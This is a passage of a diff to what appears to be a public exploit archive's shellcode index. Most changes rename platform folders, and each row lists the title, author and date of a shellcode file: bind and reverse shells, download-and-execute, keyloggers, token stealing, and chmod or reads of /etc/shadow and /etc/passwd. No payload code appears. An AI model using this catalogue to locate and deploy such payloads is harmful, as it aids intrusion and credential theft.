(37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 -37392,shellcodes/lin_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 -37393,shellcodes/lin_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 -37401,shellcodes/lin_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,lin_x86-64 -37495,shellcodes/lin_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,lin_x86 -37664,shellcodes/win_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,win_x86 -37749,shellcodes/lin_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,lin_x86 -37758,shellcodes/win_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,win_x86 -37762,shellcodes/lin_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,lin_x86 -37895,shellcodes/win_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,win_x86-64 +36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86 +36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64 +36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86 +36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86 +37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86 +37251,shellcodes/linux_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,linux_x86 +37285,shellcodes/linux_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 +37289,shellcodes/linux_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,linux_x86 +37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86 +37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 +37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 +37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64 +37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86 +37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86 +37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,linux_x86 +37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 +37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 +37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 +37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86 +37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64 +37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86 +37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86 +37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86 +37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86 +37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86 +37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64 38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx 38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z -38088,shellcodes/lin_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,lin_x86 +38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86 38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator -38116,shellcodes/lin_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,lin_x86 +38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86 38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx -38150,shellcodes/lin_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,lin_x86-64 +38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64 38194,shellcodes/android/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android -38239,shellcodes/lin_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,lin_x86-64 -38469,shellcodes/lin_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,lin_x86-64 -38708,shellcodes/lin_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,lin_x86-64 -38815,shellcodes/lin_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,lin_x86-64 +38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64 +38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64 +38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64 +38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64 38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator -39149,shellcodes/lin_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,lin_x86-64 -39152,shellcodes/lin_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,lin_x86-64 -39160,shellcodes/lin_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,lin_x86 -39185,shellcodes/lin_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,lin_x86-64 -39203,shellcodes/lin_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,lin_x86-64 -39204,shellcodes/lin_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,lin_x86 -39312,shellcodes/lin_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,lin_x86-64 +39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64 +39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64 +39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86 +39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64 +39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64 +39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86 +39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64 39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux 39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux 39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux -39383,shellcodes/lin_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,lin_x86-64 -39388,shellcodes/lin_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,lin_x86-64 -39389,shellcodes/lin_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,lin_x86 -39390,shellcodes/lin_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,lin_x86-64 +39383,shellcodes/linux_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,linux_x86-64 +39388,shellcodes/linux_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 +39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86 +39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64 39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm -39519,shellcodes/win_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,win_x86 -39578,shellcodes/lin_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,lin_x86-64 -39617,shellcodes/lin_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,lin_x86-64 -39624,shellcodes/lin_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,lin_x86-64 -39625,shellcodes/lin_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,lin_x86-64 -39684,shellcodes/lin_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,lin_x86-64 -39700,shellcodes/lin_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,lin_x86-64 -39718,shellcodes/lin_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,lin_x86-64 -40094,shellcodes/win_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,win_x86 -39722,shellcodes/lin_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,lin_x86 -39723,shellcodes/lin_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,lin_x86 +39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86 +39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64 +39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64 +39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 +39625,shellcodes/linux_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64 +39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64 +39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64 +39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64 +40094,shellcodes/windows_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 +39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86 39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator 39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows -39754,shellcodes/win_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,win_x86 -39758,shellcodes/lin_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 -39763,shellcodes/lin_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +39754,shellcodes/windows_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86 +39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows 39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator -39847,shellcodes/lin_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 -39851,shellcodes/lin_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,lin_x86 -39869,shellcodes/lin_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86 +39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple -39900,shellcodes/win_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,win_x86 -39901,shellcodes/lin_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,lin_x86 -39914,shellcodes/win_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,win_x86 +39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86 +39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86 39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows -40005,shellcodes/win_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,win_x86 -40026,shellcodes/lin_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,lin_x86 -40029,shellcodes/lin_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 -40052,shellcodes/lin_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,lin_x86-64 -40056,shellcodes/lin_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,lin_x86 -40061,shellcodes/lin_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,lin_x86-64 -40075,shellcodes/lin_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,lin_x86 -40079,shellcodes/lin_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,lin_x86-64 -40110,shellcodes/lin_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,lin_x86 -40122,shellcodes/lin_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,lin_x86-64 +40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86 +40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64 +40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86 +40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64 +40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86 +40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 +40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86 +40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 -40131,shellcodes/lin_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,lin_x86 -40139,shellcodes/lin_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,lin_x86-64 -40175,shellcodes/win_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,win_x86 -40179,shellcodes/lin_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,lin_x86 -40222,shellcodes/lin_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,lin_x86 -40223,shellcodes/lin_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,lin_x86 -40245,shellcodes/win_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,win_x86 -40246,shellcodes/win_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,win_x86 -40259,shellcodes/win_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,win_x86 -40549,shellcodes/win_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 -40560,shellcodes/win_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,win_x86 -40781,shellcodes/win_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan 